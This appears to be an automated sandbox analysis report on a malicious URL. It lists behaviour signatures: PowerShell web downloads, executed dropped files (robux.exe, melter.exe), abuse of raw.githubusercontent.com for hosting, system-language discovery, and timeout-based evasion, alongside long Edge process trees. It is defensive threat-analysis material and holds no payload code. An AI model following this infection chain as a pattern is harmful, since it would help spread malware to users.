hxxps://bullet4life

Resubmissions

03-08-2024 13:07

240803-qcmw6ayenf 10

03-08-2024 13:02

240803-p9sy1aydqc 3

03-08-2024 12:59

240803-p76gbaydld 8

Analysis

max time kernel
129s
max time network
110s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
03-08-2024 12:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://bullet4life

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow	pid	Process
112	5060	powershell.exe
114	5060	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

Processes:

powershell.exe

pid	Process
5060	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

Processes:

robux.exe

pid	Process
1212	robux.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

Processes:

flow	ioc
86	raw.githubusercontent.com
87	raw.githubusercontent.com
104	raw.githubusercontent.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

robux.exemelter.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	robux.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	melter.exe

Delays execution with timeout.exe 1 IoCs

evasion

Processes:

timeout.exe

pid	Process
2764	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exemsedge.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4182098368-2521458979-3782681353-1000\{328B866F-6190-4F58-8569-FE47694E16B6}	msedge.exe

NTFS ADS 3 IoCs

Processes:

msedge.exemsedge.exe

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 173049.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 971654.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 282624.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exeidentity_helper.exemsedge.exepowershell.exe

pid	Process
3040	msedge.exe
3040	msedge.exe
2736	msedge.exe
2736	msedge.exe
852	identity_helper.exe
852	identity_helper.exe
2600	msedge.exe
2600	msedge.exe
2628	msedge.exe
2628	msedge.exe
4644	msedge.exe
4644	msedge.exe
4552	identity_helper.exe
4552	identity_helper.exe
1552	msedge.exe
1552	msedge.exe
5060	powershell.exe
5060	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 19 IoCs

Processes:

msedge.exemsedge.exe

pid	Process
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description	pid	Process
Token: SeDebugPrivilege	5060	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exemsedge.exe

pid	Process
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe

Suspicious use of SendNotifyMessage 48 IoCs

Processes:

msedge.exemsedge.exe

pid	Process
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
2736	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe
4644	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	Process	procid_target
PID 2736 wrote to memory of 1824	2736	msedge.exe	83
PID 2736 wrote to memory of 1824	2736	msedge.exe	83
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 4820	2736	msedge.exe	84
PID 2736 wrote to memory of 3040	2736	msedge.exe	85
PID 2736 wrote to memory of 3040	2736	msedge.exe	85
PID 2736 wrote to memory of 1220	2736	msedge.exe	86
PID 2736 wrote to memory of 1220	2736	msedge.exe	86
PID 2736 wrote to memory of 1220	2736	msedge.exe	86
PID 2736 wrote to memory of 1220	2736	msedge.exe	86
PID 2736 wrote to memory of 1220	2736	msedge.exe	86
PID 2736 wrote to memory of 1220	2736	msedge.exe	86
PID 2736 wrote to memory of 1220	2736	msedge.exe	86
PID 2736 wrote to memory of 1220	2736	msedge.exe	86
PID 2736 wrote to memory of 1220	2736	msedge.exe	86
PID 2736 wrote to memory of 1220	2736	msedge.exe	86
PID 2736 wrote to memory of 1220	2736	msedge.exe	86
PID 2736 wrote to memory of 1220	2736	msedge.exe	86
PID 2736 wrote to memory of 1220	2736	msedge.exe	86
PID 2736 wrote to memory of 1220	2736	msedge.exe	86
PID 2736 wrote to memory of 1220	2736	msedge.exe	86
PID 2736 wrote to memory of 1220	2736	msedge.exe	86
PID 2736 wrote to memory of 1220	2736	msedge.exe	86
PID 2736 wrote to memory of 1220	2736	msedge.exe	86
PID 2736 wrote to memory of 1220	2736	msedge.exe	86
PID 2736 wrote to memory of 1220	2736	msedge.exe	86

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://bullet4life
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe65f046f8,0x7ffe65f04708,0x7ffe65f04718
  2⤵
  PID:1824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,13880358874963320155,8530721387228458739,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
  2⤵
  PID:4820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,13880358874963320155,8530721387228458739,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,13880358874963320155,8530721387228458739,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8
  2⤵
  PID:1220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13880358874963320155,8530721387228458739,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2156 /prefetch:1
  2⤵
  PID:1336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13880358874963320155,8530721387228458739,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1
  2⤵
  PID:1140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13880358874963320155,8530721387228458739,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4212 /prefetch:1
  2⤵
  PID:3220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13880358874963320155,8530721387228458739,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:1
  2⤵
  PID:2528
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,13880358874963320155,8530721387228458739,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4212 /prefetch:8
  2⤵
  PID:4576
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,13880358874963320155,8530721387228458739,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4212 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13880358874963320155,8530721387228458739,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
  2⤵
  PID:844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13880358874963320155,8530721387228458739,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
  2⤵
  PID:4480
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13880358874963320155,8530721387228458739,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:1
  2⤵
  PID:1636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13880358874963320155,8530721387228458739,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:1
  2⤵
  PID:1692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13880358874963320155,8530721387228458739,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
  2⤵
  PID:4620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13880358874963320155,8530721387228458739,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1
  2⤵
  PID:4916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2128,13880358874963320155,8530721387228458739,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5908 /prefetch:8
  2⤵
  PID:1908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2128,13880358874963320155,8530721387228458739,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5880 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:2600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13880358874963320155,8530721387228458739,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1
  2⤵
  PID:4864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13880358874963320155,8530721387228458739,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
  2⤵
  PID:2812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13880358874963320155,8530721387228458739,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1
  2⤵
  PID:1696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2128,13880358874963320155,8530721387228458739,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5280 /prefetch:8
  2⤵
  PID:5108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13880358874963320155,8530721387228458739,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6256 /prefetch:1
  2⤵
  PID:4984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2128,13880358874963320155,8530721387228458739,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6688 /prefetch:8
  2⤵
  PID:3328

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4516

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1000

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4180

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\TraceResume.vbe"
1⤵
PID:1616

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\TraceResume.vbe"
1⤵
PID:924

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe65f046f8,0x7ffe65f04708,0x7ffe65f04718
  2⤵
  PID:4928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,13304774161863466786,6240177033003803226,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2024 /prefetch:2
  2⤵
  PID:4220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,13304774161863466786,6240177033003803226,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2544 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2004,13304774161863466786,6240177033003803226,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2992 /prefetch:8
  2⤵
  PID:1972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,13304774161863466786,6240177033003803226,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
  2⤵
  PID:2664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,13304774161863466786,6240177033003803226,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:1
  2⤵
  PID:4048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,13304774161863466786,6240177033003803226,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1
  2⤵
  PID:2616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,13304774161863466786,6240177033003803226,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1
  2⤵
  PID:1908
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,13304774161863466786,6240177033003803226,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3624 /prefetch:8
  2⤵
  PID:3484
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,13304774161863466786,6240177033003803226,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3624 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2004,13304774161863466786,6240177033003803226,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3556 /prefetch:8
  2⤵
  PID:4232
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,13304774161863466786,6240177033003803226,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4484 /prefetch:1
  2⤵
  PID:3996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2004,13304774161863466786,6240177033003803226,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5556 /prefetch:8
  2⤵
  PID:3516
